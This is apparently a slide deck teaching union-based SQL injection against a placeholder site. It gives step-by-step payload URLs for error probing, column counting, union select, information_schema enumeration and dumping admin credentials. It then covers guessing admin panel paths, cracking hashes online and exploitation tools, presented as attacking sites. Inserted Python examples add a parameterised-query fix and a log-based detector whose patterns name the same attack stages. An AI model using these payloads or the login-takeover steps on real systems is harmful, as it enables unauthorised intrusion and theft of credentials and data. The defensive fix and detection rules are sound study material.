$Who I am? - HconGroups (groups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql...)
$Who I am?
Naeemahemad Mansuri
Student of Semester II of Master in Computer Application in
LJMCA
Individual Security Researcher
Contact :
FB -> fb.me/mansurinaeem
G talk -> [email protected]
UNSAFE WEB APPLICATION STATISTICS
• F-Secure claims 500,000 sites were affected by SQL injection in 2008
• According to http://www.zone-h.org, defacement statistics are 1 to 5 million web sites
• Over 1.5 million pages affected by SQL injection attacks, per the Shadow Server
SQL Injection Vulnerability
[Diagram: browser Request -> Web Server -> DBMS Server -> Response]
Select * from table name where id=123
http://www.victim.com/site.php?id=123
In the background, when we type or execute this URL, the request goes to the database and performs the query written in the application, like:
Select * from table name where id=123
After our request completes, we get the response from the web server together with the database result.
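To show why the id parameter ends up inside the query, here is an added example (not code from the deck) with a constructed in-memory SQLite table standing in for the MySQL back end, so sqlite_version() is used where the deck uses version(). It compares the concatenating lookup with a parameterised one against a payload of the negative-id UNION SELECT form this deck uses.

```python
"""Vulnerable vs. parameterised lookup for the site.php?id=123 query.

Added example, not from the deck. Assumptions: an in-memory SQLite
table with constructed rows replaces the MySQL database, and
sqlite_version() replaces MySQL's version().
"""
import sqlite3


def make_db():
    """Constructed sample data: an items table with three columns."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE items (id INTEGER, name TEXT, price INTEGER)")
    con.executemany("INSERT INTO items VALUES (?,?,?)",
                    [(123, "widget", 10), (124, "gadget", 20)])
    return con


def lookup_vulnerable(con, user_id):
    """Builds the query by concatenation: whatever is in ?id= becomes SQL."""
    query = "SELECT * FROM items WHERE id=" + user_id
    return con.execute(query).fetchall()


def lookup_parameterised(con, user_id):
    """Treats the id as data: it must parse as an integer and is bound by the driver."""
    try:
        id_value = int(user_id)
    except ValueError:
        return []  # reject non-numeric ids instead of interpolating them
    return con.execute("SELECT * FROM items WHERE id=?", (id_value,)).fetchall()


def demo(payload):
    """Run both lookups on the same raw ?id= value and return both results."""
    con = make_db()
    return lookup_vulnerable(con, payload), lookup_parameterised(con, payload)
```

With the payload "-123 UNION SELECT 1,sqlite_version(),3" the concatenating lookup returns a row carrying the database version, while the parameterised lookup returns nothing.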
SQL injection Basic Concept
SQL injection Classification in Web Application
SQL Injection Vulnerability
• SQL Injection
• Blind Injection
  • Simple Blind SQL Injection
  • Double Blind SQL Injection
Methods to Detect SQL Injection
• Fuzzing
• Function Testing
• Analysis of Source Code
Example of checking whether the web site is vulnerable or not
http://www.victim.com/site.php?id=123' (single quote)
http://www.victim.com/site.php?id=123'' (double quote)
http://www.victim.com/site.php?id=123'-- (single quote, minus minus)
http://www.victim.com/site.php?id=123'/*
http://www.victim.com/site.php?id=123'#
Errors in SQL injection
The error message you get when you perform SQL injection on the web application
Finding the Number of Columns
Now, after finding a SQL-injectable web site, we find the number of columns returned by the query; for that the order by clause is used (it errors once the column index exceeds the column count).
http://www.victim.com/site.php?id=123 order by 1 (No Error)
http://www.victim.com/site.php?id=123 order by 2 (No Error)
http://www.victim.com/site.php?id=123 order by 3 (No Error)
http://www.victim.com/site.php?id=123 order by 4 (No Error)
http://www.victim.com/site.php?id=123 order by 5 (No Error)
http://www.victim.com/site.php?id=123 order by 6 (No Error)
http://www.victim.com/site.php?id=123 order by 7 (Error)
If the above queries do not work, add --, --+ or --+- at the end.
Finding the Vulnerable Columns
After finding the number of columns we have to find the vulnerable column(s); for that we use union select or union select all, and we put a - sign before the id.
• Syntax
http://www.victim.com/site.php?id=-123 union select 1,2,3,4,5,6 --
It looks like this:
Finding the version, user and database name
After finding the vulnerable column we have to find the database user name, the database name and the database version used by the web site.
• Syntax
http://www.victim.com/site.php?id=-123 union select 1,user(),3,4,5,6 --
http://www.victim.com/site.php?id=-123 union select 1,database(),3,4,5,6 --
http://www.victim.com/site.php?id=-123 union select 1,version(),3,4,5,6 --
Finding the Tables Name in the DB
After finding the version, user and database we have to find the tables in the database. In the vulnerable column we write concat(table_name) or group_concat(table_name), and at the end we write
from information_schema.tables where table_schema=database()--
• Syntax
http://www.victim.com/site.php?id=-123 union select 1,concat(table_name),
3,4,5,6 from information_schema.tables where table_schema=database()--
This query displays all the table names.
Finding the Column Names of a Table
After finding the table names we have to find the column names in that table. For that we write concat(column_name) or group_concat(column_name), and at the end we write
from information_schema.columns where table_name=char()--
• Syntax
http://www.victim.com/site.php?id=-123 union select 1,concat(column_name),
3,4,5,6 from information_schema.columns where table_name=char()--
* The table name has to be converted to its MySQL char() representation.
This query displays all the column names of the table.
Extract the Data
Now that the column query has been performed, we extract or dump the data.
• Syntax
http://www.victim.com/site.php?id=-123 union select 1,concat(column1,0x3a,column2),
3,4,5,6 from admin--
* If admin does not work, convert the table name to its MySQL char() representation.
This query dumps all the data.
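From the defender's side, the same walk-through (quote/comment probes, order by column counting, union select, information_schema reads and concat extraction) leaves a recognisable trail in the web server access log. The following is an added example, not from the deck: the Apache combined-format log lines are constructed, and the rules cover only the request shapes this deck uses, after URL-decoding so that %27 and + are seen as ' and space.

```python
"""Spot the probe sequence from this deck in access-log lines.

Added example, not from the deck. The sample log lines are constructed
and the rules are limited to the request shapes shown in the deck.
"""
import re
from urllib.parse import unquote_plus

# Each rule is named after the stage of the deck it corresponds to.
RULES = [
    ("quote/comment probe", re.compile(r"'\s*(--|/\*|#)")),
    ("column counting",     re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union injection",     re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema enumeration",  re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("data extraction",     re.compile(r"\b(group_)?concat\s*\(", re.I)),
]
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def classify(line):
    """Return the names of the rules that fire on one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    target = unquote_plus(m.group(1))  # decode %27 and + before matching
    return [name for name, rx in RULES if rx.search(target)]


def scan(lines):
    """Map client IP -> stages seen, in order, so a full walk-through stands out."""
    seen = {}
    for line in lines:
        hits = classify(line)
        if hits:
            stages = seen.setdefault(line.split()[0], [])
            stages.extend(h for h in hits if h not in stages)
    return seen


# Constructed sample lines: one normal request, then a sequence mirroring the deck.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2012:13:55:36 +0000] "GET /site.php?id=123 HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Oct/2012:13:56:01 +0000] "GET /site.php?id=123%27-- HTTP/1.1" 500 312',
    '198.51.100.7 - - [10/Oct/2012:13:56:09 +0000] "GET /site.php?id=123+order+by+7-- HTTP/1.1" 500 312',
    '198.51.100.7 - - [10/Oct/2012:13:56:20 +0000] "GET /site.php?id=-123+union+select+1,2,3,4,5,6-- HTTP/1.1" 200 640',
    '198.51.100.7 - - [10/Oct/2012:13:56:31 +0000] "GET /site.php?id=-123+union+select+1,group_concat(table_name),3,4,5,6+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 780',
]
```

A single quote/comment hit can be noise; the same client moving through column counting, union injection and schema enumeration within a minute is the pattern worth alerting on.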
Login voila!
After dumping the data we have to find the admin panel of the web site; for that you try paths like:
http://www.victim.com/admin/
http://www.victim.com/adminlogin/
http://www.victim.com/controlpanel/
http://www.victim.com/administrator/
http://www.victim.com/manager/
http://www.victim.com/superuser/
We try to guess, and eventually find the admin panel.
If at the time of dumping the data you do not get the password in plain text, you have to look it up on this web site -> www.md5decrypter.co.uk/
Automated Exploitation of SQL injection
• SQLMAP (sqlmap.sourceforge.net or sqlmap.org )
Full Support : Mysql, MSsql, Oracle, Postgresql
• SQLsus (sqlsus.sourceforge.net)
Partial Support : Only Mysql Support
• HAVIJ
(http://www.itsecteam.com/products/havij-v116-advanced-sql-injection/)
Full Support : if you purchase it :P
Partial Support : is also available
You can also develop your own scripts and tools to exploit a web site that is vulnerable to SQL injection; it is up to you.
Material of SQL injection & Reference
• http://www.php.net/manual/en/security.database.sql-injection.php
• https://www.owasp.org/index.php/SQL_Injection
• SQL Injection Attacks and Defense - Syngress publication - Justin Clarke
• http://www.pentestmonkey.net Cheat Sheets: (Oracle, MSSQL, MySQL, PostgreSQL, Ingres, DB2, Informix)